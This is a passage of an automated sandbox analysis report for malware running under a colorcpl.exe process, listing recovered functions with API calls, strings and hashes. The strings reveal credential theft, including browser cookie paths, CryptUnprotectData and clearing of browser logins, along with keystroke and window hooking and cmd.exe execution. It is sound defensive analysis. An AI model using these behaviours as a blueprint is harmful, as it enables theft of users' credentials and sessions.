                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                          • String ID:
                                                          • API String ID: 2536120697-0
                                                          • Opcode ID: ca83ba06d83d12d54a2acbaf6e445ab678b29a169643e4c1d5b5ad50107a425a
                                                          • Instruction ID: 4eb41cc9c04bbbc0289e006a136de8f5905a44da0a93489cd3e0e8943abb01a0
                                                          • Opcode Fuzzy Hash: ca83ba06d83d12d54a2acbaf6e445ab678b29a169643e4c1d5b5ad50107a425a
                                                          • Instruction Fuzzy Hash: 9611E772900118A7DB14FBA4DC108DEBBAADF403E0F21055AEA14A7290DB71DE518F90
                                                          Function 02FD8319 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,02FCBCD6,00000000,?,?,02FCBD5A,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02FD831E
                                                          • _free.LIBCMT ref: 02FD8353
                                                          • _free.LIBCMT ref: 02FD837A
                                                          • SetLastError.KERNEL32(00000000,?,02F9A756), ref: 02FD8387
                                                          • SetLastError.KERNEL32(00000000,?,02F9A756), ref: 02FD8390
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$_free
                                                          • String ID:
                                                          • API String ID: 3170660625-0
                                                          • Opcode ID: 8ad50262075dc026534b44bbf98cff36561bcf7b1f357e43c809bb2c007930cb
                                                          • Instruction ID: 08fcd711b42abe7f195652534dc76f0eb197b1bba5d92e62de3f2cfea14bfde9
                                                          • Opcode Fuzzy Hash: 8ad50262075dc026534b44bbf98cff36561bcf7b1f357e43c809bb2c007930cb
                                                          • Instruction Fuzzy Hash: A901F977A817006BD716B6356C44E6A322F9BC27F5B2D0924FB1CD6180EF7588078520
                                                          Function 02FE0A3C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 02FE0A54
                                                            • Part of subcall function 02FD6802: RtlFreeHeap.NTDLL(00000000,00000000,?,02FE0CEF,?,00000000,?,00000000,?,02FE0F93,?,00000007,?,?,02FE14DE,?), ref: 02FD6818
                                                            • Part of subcall function 02FD6802: GetLastError.KERNEL32(?,?,02FE0CEF,?,00000000,?,00000000,?,02FE0F93,?,00000007,?,?,02FE14DE,?,?), ref: 02FD682A
                                                          • _free.LIBCMT ref: 02FE0A66
                                                          • _free.LIBCMT ref: 02FE0A78
                                                          • _free.LIBCMT ref: 02FE0A8A
                                                          • _free.LIBCMT ref: 02FE0A9C
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: e2c91a40d946f11fec52baf1d9aed58168aeafd376a6c6d07e4f192bf3d80b8c
                                                          • Instruction ID: 5119e4418c7cb378ec73c3c4af35f8dcb80ca58b0636ed5bacc004b6c68fd461
                                                          • Opcode Fuzzy Hash: e2c91a40d946f11fec52baf1d9aed58168aeafd376a6c6d07e4f192bf3d80b8c
                                                          • Instruction Fuzzy Hash: AAF018769052046B8B19EB5CF4D1C5673EFAE04B957688C19F246E7544CF74F8804E54
                                                          Function 02FD40E8 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 02FD4106
                                                            • Part of subcall function 02FD6802: RtlFreeHeap.NTDLL(00000000,00000000,?,02FE0CEF,?,00000000,?,00000000,?,02FE0F93,?,00000007,?,?,02FE14DE,?), ref: 02FD6818
                                                            • Part of subcall function 02FD6802: GetLastError.KERNEL32(?,?,02FE0CEF,?,00000000,?,00000000,?,02FE0F93,?,00000007,?,?,02FE14DE,?,?), ref: 02FD682A
                                                          • _free.LIBCMT ref: 02FD4118
                                                          • _free.LIBCMT ref: 02FD412B
                                                          • _free.LIBCMT ref: 02FD413C
                                                          • _free.LIBCMT ref: 02FD414D
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 9dfb397b161defc4292f782f85f567f839519538cecd26b1e194b17104a6699c
                                                          • Instruction ID: 6812144cd09b6c32a50469d9f33831d10e870bdc6bc9388233b0c4191c84c303
                                                          • Opcode Fuzzy Hash: 9dfb397b161defc4292f782f85f567f839519538cecd26b1e194b17104a6699c
                                                          • Instruction Fuzzy Hash: 42F090758431108F8721FF14BC0580577AFAF067B8B984806F104B2698CF7C4851AFC2
                                                          Function 02FA3A90 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 02FA3AF7
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 02FA3B26
                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 02FA3BC6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Enum$InfoQueryValue
                                                          • String ID: [regsplt]
                                                          • API String ID: 3554306468-4262303796
                                                          • Opcode ID: c0bf52ca672226a34f188c1f7befd4a6dfaa5833738b6f3c404113752eedfee4
                                                          • Instruction ID: aefae8343a560bfd624f1f4e6c39ecc90c8e92f5c3f1b843d4d4a17af2cd79e5
                                                          • Opcode Fuzzy Hash: c0bf52ca672226a34f188c1f7befd4a6dfaa5833738b6f3c404113752eedfee4
                                                          • Instruction Fuzzy Hash: C151207190011DAAEF11EBA5DC91EEFB77EBF14384F500065E605E6190EF706A49CFA1
                                                          Function 02FDE769 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _strpbrk.LIBCMT ref: 02FDE7B8
                                                          • _free.LIBCMT ref: 02FDE8D5
                                                            • Part of subcall function 02FCBD68: IsProcessorFeaturePresent.KERNEL32(00000017,02FCBD3A,02F9A756,?,?,00000000,02F9A756,00000000,?,?,02FCBD5A,00000000,00000000,00000000,00000000,00000000), ref: 02FCBD6A
                                                            • Part of subcall function 02FCBD68: GetCurrentProcess.KERNEL32(C0000417,?,02F9A756), ref: 02FCBD8C
                                                            • Part of subcall function 02FCBD68: TerminateProcess.KERNEL32(00000000), ref: 02FCBD93
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                          • String ID: *?$.
                                                          • API String ID: 2812119850-3972193922
                                                          • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                          • Instruction ID: 679792aec6889857586dc56890cf44b696cea989b67574451a2273a5b2fcef9a
                                                          • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                          • Instruction Fuzzy Hash: AC518075E0021AAFDF14DFA8CC80AADBBB6EF48354F284169DA54EB340E7719A01CB50
                                                          Function 02FD34D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\colorcpl.exe,00000104), ref: 02FD3515
                                                          • _free.LIBCMT ref: 02FD35E0
                                                          • _free.LIBCMT ref: 02FD35EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$FileModuleName
                                                          • String ID: C:\Windows\SysWOW64\colorcpl.exe
                                                          • API String ID: 2506810119-1707929182
                                                          • Opcode ID: cc390a9ac961217785f674509efafb5cde14564e2f9cc95928a5dfbd74bcb36b
                                                          • Instruction ID: 27b3cafa7aa24c95fe47efdecfe56968b469c59f9d67db268b4d6035243d6be3
                                                          • Opcode Fuzzy Hash: cc390a9ac961217785f674509efafb5cde14564e2f9cc95928a5dfbd74bcb36b
                                                          • Instruction Fuzzy Hash: 5731A8B1E01215AFDB21EB59DC84E9EBBFEDB85354F1840A6E70597300DB708A40CF51
                                                          Function 02F9C6F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02F9C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 02F9C594
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 02F9C727
                                                          • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 02F9C792
                                                          Strings
                                                          • User Data\Profile ?\Network\Cookies, xrefs: 02F9C73F
                                                          • User Data\Default\Network\Cookies, xrefs: 02F9C70D
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                          • API String ID: 1174141254-1980882731
                                                          • Opcode ID: c3d63a140d1a36ba28fb0204cab420a4806b6270e9b91fd1557de9b298b08205
                                                          • Instruction ID: b07d8fd6eaa8f816675aff6c5b0753dc20d2738b49b40cace39283c0dd2424da
                                                          • Opcode Fuzzy Hash: c3d63a140d1a36ba28fb0204cab420a4806b6270e9b91fd1557de9b298b08205
                                                          • Instruction Fuzzy Hash: 4A212E7190010E9AEF14FBA1DC55DEFBB7EAE543D5B40002AE706A3190EF60994ACEA0
                                                          Function 02F9C627 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02F9C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 02F9C531
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 02F9C658
                                                          • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 02F9C6C3
                                                          Strings
                                                          • User Data\Profile ?\Network\Cookies, xrefs: 02F9C670
                                                          • User Data\Default\Network\Cookies, xrefs: 02F9C63E
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                          • API String ID: 1174141254-1980882731
                                                          • Opcode ID: c466551ca507133a44442424df8100d033392665d8de72f3a03a1a0f54719b2c
                                                          • Instruction ID: c9308b665bccc747d0f21922498c3fd4d5578dc77b8826e67d770e64b44922e8
                                                          • Opcode Fuzzy Hash: c466551ca507133a44442424df8100d033392665d8de72f3a03a1a0f54719b2c
                                                          • Instruction Fuzzy Hash: A521217190010E9AEF14FBA5DC55DEFBB7EBE54395B40042AE706A3090EF60994ACEA0
                                                          Function 02F96A9E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 02F96ABD
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02F96AC4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: CryptUnprotectData$crypt32
                                                          • API String ID: 2574300362-2380590389
                                                          • Opcode ID: ee4184ffb9dbf22d5bf5a8a2eef11c0a698a96adfb06114a0359c23718a16e2f
                                                          • Instruction ID: f9fa969ef022cfd71af2adcca87f19079da93dda4af38c88bc957d994db7425c
                                                          • Opcode Fuzzy Hash: ee4184ffb9dbf22d5bf5a8a2eef11c0a698a96adfb06114a0359c23718a16e2f
                                                          • Instruction Fuzzy Hash: 2301D835E04206ABEF18CFADD9449AFBBBCEF49284F00456DEA55D3340EB709900C7A0
                                                          Function 02F9515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,02F95159), ref: 02F95173
                                                          • CloseHandle.KERNEL32(?), ref: 02F951CA
                                                          • SetEvent.KERNEL32(?), ref: 02F951D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEventHandleObjectSingleWait
                                                          • String ID: Connection Timeout
                                                          • API String ID: 2055531096-499159329
                                                          • Opcode ID: a865022ed34217475525793cefd4a696ab2f49886c340c94866ff2059249d1e2
                                                          • Instruction ID: f94c4912feab18240223e780bb76ee83877d3ed817cb90f9b7baf9562b462c89
                                                          • Opcode Fuzzy Hash: a865022ed34217475525793cefd4a696ab2f49886c340c94866ff2059249d1e2
                                                          • Instruction Fuzzy Hash: 3201DF75A81B40AFFF26BB35CC8546ABBE6AF00785744092DD79386A61DB60A440CF51
                                                          Function 02F9E800 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 02F9E86E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Exception@8Throw
                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                          • API String ID: 2005118841-1866435925
                                                          • Opcode ID: 99cc50376cb149a75e3b43c0eacdbfd40b224292f1083f7b1e70ce1311a49f3e
                                                          • Instruction ID: bede8a6649002712be2e468a0b0f7b20930c341a1900f65e687a09ccae142987
                                                          • Opcode Fuzzy Hash: 99cc50376cb149a75e3b43c0eacdbfd40b224292f1083f7b1e70ce1311a49f3e
                                                          • Instruction Fuzzy Hash: 7301D671E443087AFF54FBD4CC02FBDB35A6F10BC0F00845BAB1295581EF616645CA62
                                                          Function 02F9729B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • C:\Windows\SysWOW64\colorcpl.exe, xrefs: 02F976FF
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: C:\Windows\SysWOW64\colorcpl.exe
                                                          • API String ID: 0-1707929182
                                                          • Opcode ID: 6f5544d265726d0d24fadd115671b944ea0c846950035ab5e96d82eab88f0484
                                                          • Instruction ID: ed083c481fbf5cd0ce3930a66fb192eb805324986bc63271ab7b891f90e270f1
                                                          • Opcode Fuzzy Hash: 6f5544d265726d0d24fadd115671b944ea0c846950035ab5e96d82eab88f0484
                                                          • Instruction Fuzzy Hash: 78F0B4B0F62259DBFF19BB349D1C7B9769A9B853CAF400825F742CA294EB6548018F21
                                                          Function 02FA384F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyW.ADVAPI32(80000001,00000000,030052D8), ref: 02FA385A
                                                          • RegSetValueExW.ADVAPI32(030052D8,?,00000000,00000001,00000000,00000000,030052F0,?,02F9F85E,pth_unenc,030052D8), ref: 02FA3888
                                                          • RegCloseKey.ADVAPI32(030052D8,?,02F9F85E,pth_unenc,030052D8), ref: 02FA3893
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID: pth_unenc
                                                          • API String ID: 1818849710-4028850238
                                                          • Opcode ID: 9e1aa22d1bda7590d1a3106f4d832b50f2195d733351773e48dcb8729ba6e652
                                                          • Instruction ID: c31cde0ed4924e7519013a8116ac6ce49d0afcf638318c662b5551e8340d72f7
                                                          • Opcode Fuzzy Hash: 9e1aa22d1bda7590d1a3106f4d832b50f2195d733351773e48dcb8729ba6e652
                                                          • Instruction Fuzzy Hash: F5F0CDB298011CFBDF00AFB0EC45FEA772CEF00B90F004564FA069A000EB719A14CBA0
                                                          Function 02FA6129 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 02FA616B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExecuteShell
                                                          • String ID: /C $cmd.exe$open
                                                          • API String ID: 587946157-3896048727
                                                          • Opcode ID: b5f79ecbd7760bcdacf3066085a200a540a26d357bf888c6fa7f44f352b51527
                                                          • Instruction ID: ba9bbeaef70a6b6219d540d6faa9bf74c51198ef4913678df0c0f0831df46673
                                                          • Opcode Fuzzy Hash: b5f79ecbd7760bcdacf3066085a200a540a26d357bf888c6fa7f44f352b51527
                                                          • Instruction Fuzzy Hash: 2AE0C0B16443096AFA45F664CCA4DAFB3AEAE507C4B400C2DB357920A1EF649909CE55
                                                          Function 02F9B8E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • TerminateThread.KERNEL32(Function_0000A2B8,00000000,030052F0,pth_unenc,02F9D0F3,030052D8,030052F0,?,pth_unenc), ref: 02F9B8F6
                                                          • UnhookWindowsHookEx.USER32(030050F0), ref: 02F9B902
                                                          • TerminateThread.KERNEL32(02F9A2A2,00000000,?,pth_unenc), ref: 02F9B910
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: TerminateThread$HookUnhookWindows
                                                          • String ID: pth_unenc
                                                          • API String ID: 3123878439-4028850238
                                                          • Opcode ID: c5e6edb9afea8ccc736581c73af83ecc0dda8cd87c802c60cd83f14a98c96d2d
                                                          • Instruction ID: 2a511a6e11e59dca11ebc98feeb08bdb7f1a834faa50e3ce69189feea5b8f913
                                                          • Opcode Fuzzy Hash: c5e6edb9afea8ccc736581c73af83ecc0dda8cd87c802c60cd83f14a98c96d2d
                                                          • Instruction Fuzzy Hash: EDE01272A44319EFFF615F90A8988A5BBADEA051D9314092DF3C246525C6B14C50C760
                                                          Function 02FDA084 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __alldvrm$_strrchr
                                                          • String ID:
                                                          • API String ID: 1036877536-0
                                                          • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                          • Instruction ID: cc0ff7e65d9bd1627f8fa059cc8f702c8c774bb9aa79e4400d1e157d3aeda6ef
                                                          • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                          • Instruction Fuzzy Hash: 24A14A72E007869FEB128F28CC817ADBBE7EF51394F2C41ADD6559B281D3358941CB58
                                                          Function 02FD2851 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 94be7c1a80cb6ddcbdc91585dca4124af392995551df31f04f9d6c51b55eb610
                                                          • Instruction ID: 15faf1559d442142589fb0594639bcd080adc347becba9fdf5aca82a0812bf17
                                                          • Opcode Fuzzy Hash: 94be7c1a80cb6ddcbdc91585dca4124af392995551df31f04f9d6c51b55eb610
                                                          • Instruction Fuzzy Hash: A6413972A40704AFE725AF78CC40F6EBBEBEB88750F14452EE616DB281D77195018BD0
                                                          Function 02F9C047 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • Cleared browsers logins and cookies., xrefs: 02F9C130
                                                          • [Cleared browsers logins and cookies.], xrefs: 02F9C11F
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                          • API String ID: 3472027048-1236744412
                                                          • Opcode ID: 6ab8403c915d555f9babaac675ce6b5ab823d3768edc7e8dbb6d646549109330
                                                          • Instruction ID: 190463538caee1c258609b808f81f111443049638b1b23d477c611a0430f8089
                                                          • Opcode Fuzzy Hash: 6ab8403c915d555f9babaac675ce6b5ab823d3768edc7e8dbb6d646549109330
                                                          • Instruction Fuzzy Hash: ED31F925B4D3806EFE11BBB458257AA7F830F57AC8F08845EEBD5573A2CA52440C8B63
                                                          Function 02F9A564 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02FAC5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02FAC5F2
                                                            • Part of subcall function 02FAC5E2: GetWindowTextLengthW.USER32(00000000), ref: 02FAC5FB
                                                            • Part of subcall function 02FAC5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 02FAC625
                                                          • Sleep.KERNEL32(000001F4), ref: 02F9A5AE
                                                          • Sleep.KERNEL32(00000064), ref: 02F9A638
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$SleepText$ForegroundLength
                                                          • String ID: [ $ ]
                                                          • API String ID: 3309952895-93608704
                                                          • Opcode ID: 2aac33eb4453b9649a6fe27f22f7cb311751d9aed7e6f0f72b5b8c96a9546332
                                                          • Instruction ID: 6d689e2ebb0f9ac4a20b688cecdd9948ca8d2170aadacd52b40030b738be6ba0
                                                          • Opcode Fuzzy Hash: 2aac33eb4453b9649a6fe27f22f7cb311751d9aed7e6f0f72b5b8c96a9546332
                                                          • Instruction Fuzzy Hash: 1911D232A042045BEE14FB74CC11A6FB7AAAF603C4F40042DE756562E1FF61EA09CF92
                                                          Function 02FD3AD3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f2fbe3181a9c411838e30296e166797c8b4dd5e435d8a4633b86fc4e2e0858fc
                                                          • Instruction ID: 340e969e981ae1f518ebaba16c196eb9cc176370d8a579055c7784ca37fdfee8
